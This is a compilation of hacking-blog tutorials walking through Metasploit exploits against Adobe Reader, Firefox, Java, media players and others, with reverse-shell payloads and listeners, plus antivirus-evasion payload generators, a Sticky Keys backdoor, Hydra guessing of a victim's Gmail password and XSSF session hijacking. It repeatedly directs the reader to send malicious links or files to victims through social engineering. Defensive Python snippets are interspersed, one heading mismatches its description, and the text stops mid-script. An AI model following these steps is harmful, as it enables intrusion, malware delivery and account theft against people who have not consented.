Channel: Hacking Articles|Raj Chandel's Blog

Hack Remote Windows PC Using AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass

This module exploits a vulnerability in the Adobe Reader X sandbox. The vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe process to write registry values, which can be used to trigger a buffer overflow in the AdobeCollabSync component, allowing a Low Integrity AcroRd32.exe process to achieve Medium Integrity Level privileges. This module has been tested successfully on Adobe Reader X 10.1.4 on Windows 7 SP1.

Exploit Targets
Adobe Reader X 10.1.4
Windows 7

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC).

Once you have the meterpreter session, use the ‘ps’ command, which displays a list of the running processes on the target.



Migrate to the sandboxed AcroRd32 process.


Now type use exploit/windows/local/adobe_sandbox_adobecollabsync
msf exploit (adobe_sandbox_adobecollabsync)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_sandbox_adobecollabsync)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (adobe_sandbox_adobecollabsync)>set session 1
msf exploit (adobe_sandbox_adobecollabsync)>exploit




Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG "use" element (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame's window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if POSIX), and then execute it. Note: Flash is used here to trigger the exploit, but any Firefox plugin with script access should be able to trigger it.

Exploit Targets
Firefox 17.0.1
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7


Open a Backtrack terminal and type msfconsole


Now type use exploit/multi/browser/firefox_svg_plugin
msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)
msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)
msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)
msf exploit (firefox_svg_plugin)>exploit


Now the URL you should give to your victim is http://192.168.1.167:8080/


Send the link of the server to the victim via chat, email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” to list the sessions and find the session number, then type “sessions -i ID” to connect to that session.


Veil - A Metasploit Payload Generator to Bypass Antivirus

Veil is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions.

First download Veil from here, unzip the file and save it on your desktop.

Run the setup script on Kali x86: ./setup.sh


Now install Python 2.7.5 on your PC.





Now open the Veil folder, run ./Veil.py and choose option 1.


You can choose Metasploit’s standard msfvenom shellcode. I just chose the default, msfvenom.


Now you can choose the type of payload; I just chose reverse TCP. Then enter the IP address of the Kali system and the port you want to use.


Now select option 1, pyinstaller.


The generated file is placed at /root/Desktop/Veil/dist/payload.exe


Open Kali terminal type msfconsole

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.174
set lport 4444
exploit

Now send your payload.exe file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.

How to Install Simple-Ducky Payload Generator

Ducky currently uses version 2.6 of the duck encoder. The latest version of the Simple-Ducky supports all Debian Linux distros (i.e. Kali Linux, Ubuntu, Linux Mint etc.). The smart installer will take care of all the work for you.

With the simple-ducky, in a matter of seconds you can:
Create your evil executable (it is automatically placed in your web directory)
Create your inject.bin
Launch a listener (meterpreter or netcat)
Generate custom password lists
Crack extracted passwords
And so much more...

Dependencies
The following dependencies are automatically installed on version 1.1.0 and above:
Apache2
Pure-FTPD
Nautilus
GNOME-Terminal
GIT
WGET
Burp Suite
Social Engineering Tool Kit (SE-Toolkit)
Metasploit
p7zip-full
john
dfu-programmer
openjdk-7-jre-headless
samdump2
bkhive

Installing Simple-Ducky Payload Generator in Kali Linux

First download Simple-Ducky Payload Generator from here (and save it on your desktop).

You will get a file with the name installer_V1.1.0_debian.sh

Give all permissions to this file using the “chmod” command as shown below:


chmod 777 installer_V1.1.0_debian.sh


Now install the downloaded package using ./installer_V1.1.0_debian.sh


As part of the installation procedure, setup will ask about updating the Java JDK version; select option 2 from the selection menu.


In order to use this application we need one user. Enter the name and password of the primary user when prompted (raj in this case).


Open a new terminal and type ftp 127.0.0.1
You will be asked for a user name and password for authentication; use the user name and password created above.


After successful authentication, open a new terminal and type simple-ducky


You will get the screen shown below, which confirms the installation of Simple-Ducky Payload Generator.


The installation of Simple-Ducky Payload Generator is complete; stay tuned for further usage of Simple-Ducky Payload Generator in coming articles.

Hack Remote PC using Sun Java Web Start Double Quote Injection

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The parameters initial-heap-size and max-heap-size in a JNLP file can contain a double quote which is not properly sanitized when creating the command line for javaw.exe. This allows the injection of the -XXaltjvm option to load a jvm.dll from a remote UNC path into the java process. Thus an attacker can execute arbitrary code in the context of the browser user. This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled. Alternatively, a UNC path containing a jvm.dll can be specified together with one's own SMB server.
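The root cause described above is a value that is only ever meant to be a number being spliced into a command-line string. The following is an added example (not code from the article or from the JRE) of the defensive side: parse the JNLP, accept heap sizes only if they match a strict digits-plus-suffix pattern, and hand the result to the launcher as an argument list rather than a string. The sample JNLP documents and the -Dinjected option are constructed for the example.

```python
"""Strict validation of JNLP heap-size attributes before building javaw arguments."""
import re
import xml.etree.ElementTree as ET

# A heap size is digits with an optional k/m/g suffix. Anything else (quotes, spaces,
# dashes) is rejected outright instead of being escaped.
HEAP_SIZE_RE = re.compile(r"^[0-9]{1,10}[kKmMgG]?$")

# Constructed sample: a well-formed JNLP resource block (initial-heap-size and
# max-heap-size are the real attribute names on the j2se element).
GOOD_JNLP = """<jnlp spec="1.0+" codebase="http://example.invalid/app/">
  <resources>
    <j2se version="1.6+" initial-heap-size="64m" max-heap-size="128m"/>
    <jar href="app.jar"/>
  </resources>
</jnlp>"""

# Constructed sample: the same file with a double quote and an extra option smuggled
# into max-heap-size (the XML entity &quot; becomes a literal " after parsing).
BAD_JNLP = GOOD_JNLP.replace(
    'max-heap-size="128m"', 'max-heap-size="128m&quot; -Dinjected=1"'
)


def validate_heap_size(value):
    """Return the value unchanged if it is a plain heap size, else raise ValueError."""
    if value is None:
        return None
    if not HEAP_SIZE_RE.match(value):
        raise ValueError(f"rejecting heap size {value!r}: not of the form <digits>[k|m|g]")
    return value


def build_javaw_args(jnlp_text):
    """Extract validated -Xms/-Xmx arguments from a JNLP document as a list."""
    root = ET.fromstring(jnlp_text)
    args = []
    for j2se in root.iter("j2se"):
        initial = validate_heap_size(j2se.get("initial-heap-size"))
        maximum = validate_heap_size(j2se.get("max-heap-size"))
        if initial:
            args.append("-Xms" + initial)
        if maximum:
            args.append("-Xmx" + maximum)
    # Each element is one argv entry; a launcher would pass this list to
    # subprocess.Popen([javaw, *args, ...]) so no shell quoting is ever involved.
    return args


def is_safe_jnlp(jnlp_text):
    """True if every heap-size attribute in the document passes validation."""
    try:
        build_javaw_args(jnlp_text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("good:", build_javaw_args(GOOD_JNLP))
    print("bad accepted?", is_safe_jnlp(BAD_JNLP))
```

The allow-list pattern is the important part: an escaping routine for double quotes would have closed this specific hole but not the next delimiter an attacker finds, whereas a value that cannot contain anything but digits and a suffix cannot be turned into a second option at all.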

Exploit Targets
Java Runtime 1.6.31

Requirement
Attacker: Kali Linux
Victim PC: Windows PC

Open a Kali Linux terminal and type msfconsole


Now type use exploit/windows/browser/java_ws_double_quote
msf exploit (java_ws_double_quote)>set payload windows/meterpreter/reverse_tcp
msf exploit (java_ws_double_quote)>set lhost 192.168.1.167 (IP of Local Host)
msf exploit (java_ws_double_quote)>set srvhost 192.168.1.167 (This must be an address on the local machine)
msf exploit (java_ws_double_quote)>set uripath / (The Url to use for this exploit)
msf exploit (java_ws_double_quote)>exploit


Now the URL you should give to your victim is http://192.168.1.167:80


Send the link of the server to the victim via chat, email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” to list the sessions and find the session number, then type “sessions -i ID” to connect to that session.


Swaparoo: Meterpreter Script to Backdoor Windows

Swaparoo is a Windows backdoor method for Windows Vista/7/8. This code sneaks a backdoor command shell in place of the Sticky Keys prompt or the Utilman assistant at the login screen.

First download Swaparoo from here, unzip the file and save it on your desktop.


In your Kali Linux, copy Swaparoo.rb to /opt/metasploit/apps/pro/msf3/scripts/Meterpreter



Hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC).

After getting the Meterpreter session, type run Swaparoo to replace sethc.exe with the command prompt.

Press the shift key 5 times to open the cmd prompt.


Run Swaparoo -u to replace Utilman.exe with the cmd prompt.
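Both variants leave a plain fingerprint on the host: the accessibility binary on disk is a copy of a shell, or an Image File Execution Options "Debugger" value redirects it to one. The following is an added audit script (not part of Swaparoo or the article) that checks for exactly those two conditions. The live collector reads the IFEO registry key and hashes the binaries in System32 and only runs on Windows; everywhere else the script runs against a constructed sample, whose hash values are placeholders and not real digests.

```python
"""Audit for accessibility-binary hijacks (sethc.exe / utilman.exe and friends)."""
import hashlib
import os
import sys

# Accessibility helpers that Windows launches from the logon screen as SYSTEM.
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", "magnify.exe")
SHELLS = ("cmd.exe", "powershell.exe")
IFEO_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"


def sha256_of(path):
    """SHA-256 of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_hijacks(ifeo, file_hashes, shell_hashes):
    """Return (binary, reason) findings.

    ifeo:         image name -> dict of IFEO values, e.g. {"sethc.exe": {"Debugger": "..."}}
    file_hashes:  image name -> sha256 of the file in System32 (None if absent)
    shell_hashes: set of sha256 values of the known shells on the same host
    """
    ifeo = {k.lower(): v for k, v in ifeo.items()}
    file_hashes = {k.lower(): v for k, v in file_hashes.items()}
    findings = []
    for name in ACCESSIBILITY_BINARIES:
        debugger = ifeo.get(name, {}).get("Debugger")
        if debugger:
            findings.append((name, f"IFEO Debugger value set to {debugger!r}"))
        digest = file_hashes.get(name)
        if digest is not None and digest in shell_hashes:
            findings.append((name, "file on disk has the hash of a command shell"))
    return findings


def collect_windows():
    """Gather IFEO values and binary hashes from a live Windows host (Windows only)."""
    import winreg  # standard library, present only on Windows

    ifeo = {}
    try:
        base = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, IFEO_KEY)
    except OSError:
        base = None
    if base is not None:
        with base:
            for name in ACCESSIBILITY_BINARIES:
                try:
                    with winreg.OpenKey(base, name) as sub:
                        ifeo[name] = {"Debugger": winreg.QueryValueEx(sub, "Debugger")[0]}
                except OSError:
                    pass  # no IFEO subkey or no Debugger value: nothing to report
    system32 = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "System32")

    def digest(filename):
        path = os.path.join(system32, filename)
        return sha256_of(path) if os.path.isfile(path) else None

    file_hashes = {n: digest(n) for n in ACCESSIBILITY_BINARIES}
    shell_hashes = {h for h in map(digest, SHELLS) if h}
    return ifeo, file_hashes, shell_hashes


# Constructed sample data: the hashes are placeholders, not real file digests.
SAMPLE_SHELL_HASH = "c" * 64
SAMPLE_IFEO = {"sethc.exe": {"Debugger": r"C:\Windows\System32\cmd.exe"}}
SAMPLE_FILE_HASHES = {"sethc.exe": "a" * 64, "utilman.exe": SAMPLE_SHELL_HASH, "osk.exe": "b" * 64}


def demo():
    """Run the audit over the constructed sample and return its findings."""
    return find_hijacks(SAMPLE_IFEO, SAMPLE_FILE_HASHES, {SAMPLE_SHELL_HASH})


if __name__ == "__main__":
    data = collect_windows() if sys.platform == "win32" else (
        SAMPLE_IFEO, SAMPLE_FILE_HASHES, {SAMPLE_SHELL_HASH})
    for binary, reason in find_hijacks(*data):
        print(f"[!] {binary}: {reason}")
```

Hash comparison against the host's own cmd.exe and powershell.exe catches the file-swap case without needing a vendor hash list; checking the Authenticode signature of each accessibility binary is the natural extension on a real deployment.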

Exploit Windows, Linux or MAC PC using Java Applet Driver Manager Privileged toString() Remote Code Execution

This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise, the applet is launched without click-to-play bypass.

Exploit Targets
Java 7 Update 17
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Kali Linux
Victim PC: Windows XP


Open a Kali Linux terminal and type msfconsole


Now type use exploit/windows/browser/java_jre17_driver_manager
msf exploit (java_jre17_driver_manager)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_driver_manager)>set lhost 192.168.1.158 (IP of Local Host)
msf exploit (java_jre17_driver_manager)>set srvhost 192.168.1.158 (This must be an address on the local machine)
msf exploit (java_jre17_driver_manager)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_driver_manager)>exploit


Now the URL you should give to your victim is http://192.168.1.158:8080


Send the link of the server to the victim via chat, email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” to list the sessions and find the session number, then type “sessions -i ID” to connect to that session.




Hack Windows PC using Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation

This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel space. The corruption occurs while handling ioctl requests with code 0x1438BB, where a 0x00000009 dword is written to an arbitrary address. An entry within the HalDispatchTable is overwritten in order to execute arbitrary code when NtQueryIntervalProfile is called. The module has been tested successfully on Windows XP SP3 with Novell Client 4.91 SP4.

Exploit Targets
Novell Client 4.91 SP4

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP


Open a Kali Linux terminal and type msfconsole


Now type use exploit/windows/local/novell_client_nwfs
msf exploit (novell_client_nwfs)>set payload windows/meterpreter/reverse_tcp
msf exploit (novell_client_nwfs)>set lhost 192.168.1.114 (IP of Local Host)
msf exploit (novell_client_nwfs)>set srvhost 192.168.1.114 (IP of Local Host)
msf exploit (novell_client_nwfs)>set session 1
msf exploit (novell_client_nwfs)>exploit



Hack Windows, Linux or MAC PC using Java Applet Provider Skeleton Insecure Invoke Method

This module abuses the insecure invoke() method of the Provider Skeleton class, which allows calling arbitrary static methods with user-supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Exploit Targets
Windows PC
Linux PC
MAC PC
Java 7 update 21

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali Linux terminal and type msfconsole


Now type use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit (java_jre17_provider_skeleton)>set payload java/meterpreter/reverse_tcp
msf exploit (java_jre17_provider_skeleton)>set lhost 192.168.1.146 (IP of Local Host)
msf exploit (java_jre17_provider_skeleton)>set srvhost 192.168.1.146 (This must be an address on the local machine)
msf exploit (java_jre17_provider_skeleton)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_provider_skeleton)>exploit


Now the URL you should give to your victim is http://192.168.1.146:8080

Send the link of the server to the victim via chat, email or any social engineering technique.


Now you have access to the victim's PC. Use “sessions -l” to list the sessions and find the session number, then type “sessions -i ID” to connect to that session.

Hack Remote Windows PC using ABBS Audio Media Player .LST Buffer Overflow

This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding an .lst file, allowing arbitrary code execution with the privileges of the user running the application. This module has been tested successfully on ABBS Audio Media Player 3.1 on Windows XP SP3 and Windows 7 SP1.

Exploit Targets
ABBS Audio Media Player 3.1

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali Linux terminal and type msfconsole


Now type use exploit/windows/fileformat/abbs_amp_lst
msf exploit (abbs_amp_lst)>set payload windows/meterpreter/reverse_tcp
msf exploit (abbs_amp_lst)>set lhost 192.168.1.115 (IP of Local Host)
msf exploit (abbs_amp_lst)>exploit


After we successfully generate the malicious lst file, it is stored on your local computer at
/root/.msf4/local/msf.lst


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.115
exploit

Now send your msf.lst file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.


Hack Gmail Password using Hydra in kali Linux

Open your Kali Linux terminal, type xhydra and press enter.


You can also do this manually. First open Kali Linux and follow this path:

Kali Linux -> Password Attacks -> Online Attacks -> Hydra


In the Target tab, select:
Single Target: smtp.gmail.com
Protocol: smtp


In the Passwords tab, set:
Username: the victim's email ID

In the Password section, select the password list option and browse to select your
passwords file. Here I have used my custom password file.


Now select the Start tab and click the Start button; the password cracking begins and the result is as follows.
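From the mail server's side, an online guessing run like this one shows up as a burst of SASL authentication failures from one client address. The following is an added example (not code from the article or from Hydra) of the corresponding detection logic: it parses Postfix-style smtpd log lines, keeps a sliding window of failures per source IP and raises an alert when the count inside the window reaches a threshold. The log lines, addresses and the threshold/window values are constructed for the example.

```python
"""Detect SMTP AUTH brute force from Postfix-style smtpd log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches the Postfix warning written for every failed SASL authentication attempt.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: "
    r"warning: \S+\[(?P<ip>[0-9.]+)\]: SASL \w+ authentication failed"
)
LOG_YEAR = 2013  # syslog timestamps carry no year; assumed for the sample


def parse_failures(lines):
    """Map source IP -> list of datetimes of failed AUTH attempts."""
    failures = defaultdict(list)
    for line in lines:
        match = LINE_RE.match(line)
        if not match:
            continue  # successful logins, delivery lines, unrelated daemons
        stamp = datetime.strptime(match.group("ts"), "%b %d %H:%M:%S").replace(year=LOG_YEAR)
        failures[match.group("ip")].append(stamp)
    return failures


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {ip: peak failures within one window} for every IP over the threshold."""
    alerts = {}
    for ip, stamps in parse_failures(lines).items():
        window = deque()
        for stamp in sorted(stamps):
            window.append(stamp)
            while (stamp - window[0]).total_seconds() > window_seconds:
                window.popleft()  # drop attempts that fell out of the window
            if len(window) >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), len(window))
    return alerts


# Constructed sample log: six failures in 15 s from one address, two from another,
# plus a successful login and an unrelated line that must be ignored.
SAMPLE_LOG = [
    "Jun 12 10:15:01 mx1 postfix/smtpd[2211]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure",
    "Jun 12 10:15:04 mx1 postfix/smtpd[2211]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure",
    "Jun 12 10:15:05 mx1 postfix/smtpd[2214]: warning: unknown[198.51.100.9]: SASL PLAIN authentication failed: authentication failure",
    "Jun 12 10:15:07 mx1 postfix/smtpd[2211]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure",
    "Jun 12 10:15:10 mx1 postfix/smtpd[2211]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure",
    "Jun 12 10:15:12 mx1 postfix/smtpd[2214]: 3A2B1C: client=unknown[198.51.100.9], sasl_method=PLAIN, sasl_username=alice",
    "Jun 12 10:15:13 mx1 postfix/smtpd[2211]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure",
    "Jun 12 10:15:16 mx1 postfix/smtpd[2211]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure",
    "Jun 12 10:15:30 mx1 postfix/smtpd[2214]: warning: unknown[198.51.100.9]: SASL PLAIN authentication failed: authentication failure",
    "Jun 12 10:15:31 mx1 postfix/qmgr[1900]: 3A2B1C: from=<alice@example.invalid>, size=512, nrcpt=1 (queue active)",
]

if __name__ == "__main__":
    for ip, count in detect_bruteforce(SAMPLE_LOG).items():
        print(f"[!] {ip}: {count} failed AUTH attempts within 60 s")
```

The window keeps memory per source bounded to the attempts that can still matter, and the threshold is deliberately a parameter: a webmail proxy that legitimately fronts many users needs a far higher value than an edge relay.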

Hack Windows 7 PC Remotely using ERS Viewer 2013 ERS File Handling Buffer Overflow

This module exploits a buffer overflow vulnerability found in ERS Viewer 2013. The vulnerability exists in the module ermapper_u.dll, where the function rf_report_error handles user-provided data in an insecure way. It results in arbitrary code execution in the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2013 (version 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.

Exploit Targets
ERS Viewer 2013

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali Linux terminal and type msfconsole


Now type use exploit/windows/fileformat/erdas_er_viewer_rf_report_error
msf exploit (erdas_er_viewer_rf_report_error)>set payload windows/meterpreter/reverse_tcp
msf exploit (erdas_er_viewer_rf_report_error)>set lhost 192.168.1.164 (IP of Local Host)
msf exploit (erdas_er_viewer_rf_report_error)>exploit


After we successfully generate the malicious ers file, it is stored on your local computer at
/root/.msf4/local/msf.ers


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.164
exploit

Now send your msf.ers file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.

Hack Windows 7 PC Remotely using MediaCoder .M3U Buffer Overflow

This module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability occurs when adding an .m3u file, allowing arbitrary code execution in the context of the user. DEP bypass via ROP is supported on Windows 7, since MediaCoder runs with DEP. This module has been tested successfully on MediaCoder 0.8.21.5539 to 0.8.22.5530 on Windows XP SP3 and Windows 7 SP0.
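The ABBS .lst and MediaCoder .m3u bugs above are the same defect: a playlist entry is copied into a fixed-size buffer without first checking that it fits. The following is an added example (not code from the article, from Metasploit or from either player) of the bounded form of that loader: every entry is length-checked and screened for control characters before it is kept, and the whole file is size-capped before decoding. The entry limit of 260 characters is an assumption matching Windows MAX_PATH, and the sample playlist is constructed.

```python
"""Bounded playlist (.m3u / .lst) loader: reject entries that could not fit a fixed buffer."""
MAX_ENTRY_LENGTH = 260      # assumed ceiling per entry (Windows MAX_PATH)
MAX_ENTRIES = 10_000        # assumed ceiling on playlist length
MAX_FILE_BYTES = 1 << 20    # assumed ceiling on the raw file size (1 MiB)


def parse_playlist(text, max_len=MAX_ENTRY_LENGTH, max_entries=MAX_ENTRIES):
    """Return (entries, problems).

    entries:  accepted playlist entries in file order
    problems: (line number, reason) for every rejected line
    """
    entries, problems = [], []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or M3U directive/comment such as #EXTM3U, #EXTINF
        if len(line) > max_len:
            # This is the line an unchecked strcpy/memcpy would overflow on.
            problems.append((lineno, f"entry of {len(line)} chars exceeds limit {max_len}"))
            continue
        if any(ord(ch) < 0x20 for ch in line):
            problems.append((lineno, "entry contains control characters"))
            continue
        if len(entries) >= max_entries:
            problems.append((lineno, f"more than {max_entries} entries; rest ignored"))
            break
        entries.append(line)
    return entries, problems


def load_playlist(data):
    """Decode raw file bytes with a size cap, then parse them."""
    if len(data) > MAX_FILE_BYTES:
        raise ValueError(f"playlist of {len(data)} bytes exceeds {MAX_FILE_BYTES}")
    return parse_playlist(data.decode("utf-8", errors="replace"))


# Constructed sample: two good entries, one oversized entry, one with a control byte.
SAMPLE_PLAYLIST = "\n".join([
    "#EXTM3U",
    "#EXTINF:213,Track One",
    "C:\\Music\\track01.mp3",
    "track02.mp3",
    "A" * 5000 + ".mp3",
    "bad\x01entry.mp3",
])

if __name__ == "__main__":
    good, bad = load_playlist(SAMPLE_PLAYLIST.encode())
    print("accepted:", good)
    for lineno, reason in bad:
        print(f"line {lineno}: {reason}")
```

Rejecting and reporting rather than silently truncating matters for the defender: a playlist carrying a multi-kilobyte entry is far more likely to be an exploit attempt than a real path, and the rejection is the event worth logging.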

Exploit Targets
MediaCoder 0.8.22

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/fileformat/mediacoder_m3u
msf exploit (mediacoder_m3u)>set payload windows/meterpreter/reverse_tcp
msf exploit (mediacoder_m3u)>set lhost 192.168.1.147 (IP of Local Host)
msf exploit (mediacoder_m3u)>exploit


After we successfully generate the malicious m3u file, it is stored on your local computer at
/root/.msf4/local/msf.m3u


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.147
exploit

Now send your msf.m3u file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.



Exploit Remote Windows PC using Corel PDF Fusion Stack Buffer Overflow

This module exploits a stack-based buffer overflow vulnerability in version 1.11 of Corel PDF Fusion. The vulnerability exists while handling an XPS file with long entry names. In order for the payload to be executed, an attacker must convince the target user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the attacker can execute arbitrary code as the target user.

Exploit Targets
Corel PDF Fusion 1.11

Requirement
Attacker: Kali Linux
Victim PC: Windows XP SP 3

Open a Kali Linux terminal and type msfconsole


Now type use exploit/windows/fileformat/corelpdf_fusion_bof
msf exploit (corelpdf_fusion_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (corelpdf_fusion_bof)>set lhost 192.168.1.147 (IP of Local Host)
msf exploit (corelpdf_fusion_bof)>exploit


After we successfully generate the malicious xps file, it is stored on your local computer at
/root/.msf4/local/msf.xps


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.147
exploit

Now send your msf.xps file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.


Hack Remote Windows PC using Apple Quicktime 7 Invalid Atom Length Buffer Overflow

This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x. The vulnerability is triggered when opening a malformed p2g file containing an overly long string in the 'name' attribute of the file element. This results in overwriting a structured exception handler record.

Exploit Targets
Apple Quicktime 7.7.3
Internet Explorer 8
Windows XP SP3

Requirement
Attacker: Kali Linux
Victim PC: Windows XP

Open a Kali Linux terminal and type msfconsole


Now type use exploit/windows/fileformat/apple_quicktime_rdrf
msf exploit (apple_quicktime_rdrf)>set payload windows/meterpreter/reverse_tcp
msf exploit (apple_quicktime_rdrf)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (apple_quicktime_rdrf)>exploit


After we successfully generate the malicious mov file, it is stored on your local computer at
/root/.msf4/local/msf.mov


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.6
exploit

Now send your msf.mov file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.

Bypass Antivirus and Hack Remote Windows PC with Syringe

First download syringe-antivirus-bypass from here.

Now untar the file: tar xvf syringe.tar


Now you can start it with ./syringe.sh


After we successfully generate the malicious exe file, it is stored on your local computer at
/Home/Desktop/syringe/backdoor.exe


Now send your backdoor.exe file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.

XSSF Cross-Site Scripting Framework in Metasploit

The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the task of exploiting XSS vulnerabilities into much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities by making their exploitation accessible. This project is created solely for education, penetration testing and lawful research purposes.

XSSF allows creating a communication channel with the targeted browser (from an XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) in order to target specific browsers.

XSSF provides a powerful, documented API, which facilitates the development of modules and attacks. In addition, its integration into the Metasploit Framework allows users to launch MSF browser-based exploits easily from an XSS vulnerability.

In addition, an interesting thought when exploiting an XSS inside a victim's browser could be to browse the website on the attacker's browser using the connected victim's session. In most cases, simply stealing the victim's cookie will be sufficient for this. But in a minority of cases (intranets, network tool portals, etc.), the cookie won't be useful to an external attacker. That's why XSSF Tunnel was created: to help the attacker browse the affected domain using the victim's session.

Open your Kali Linux terminal and type cd /opt/metasploit/apps/pro/msf3

In msf3, install XSSF using the following command:

svn export http://xssf.googlecode.com/svn/trunk ./ --force

Now XSSF is successfully installed in your Metasploit.


Load XSSF plugin using the command 'load xssf'


Type help xssf to find all xssf commands


Now use the xssf_urls command to get a list of all available URLs.


Send the link of the server to the victim via chat, email or any social engineering technique.


We can see information related to any of the victims using the command xssf_information.

Hack Remote Windows 7 PC using Chasys Draw IES Buffer Overflow

This module exploits a buffer overflow vulnerability found in Chasys Draw IES (version 4.10.01). The vulnerability exists in the module flt_BMP.dll while parsing BMP files, where the ReadFile function is used to store user-provided data on the stack in an insecure way. It results in arbitrary code execution in the context of the user viewing a specially crafted BMP file. This module has been tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7 SP1.
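A BMP parser that calls ReadFile with a length taken from the file's own header (image size, colour-table count, pixel offset) into a stack buffer is exactly the pattern described above. The following is an added example (not code from the article, from Metasploit or from Chasys Draw IES) of a header validator that cross-checks every header field against the actual file length and fixed ceilings before any data is read into a buffer. The dimension ceiling is an assumption; the sample bitmaps, including the corrupt variant with an absurd biClrUsed value, are constructed inline.

```python
"""Validate BMP headers against the file's real length before any data is buffered."""
import struct

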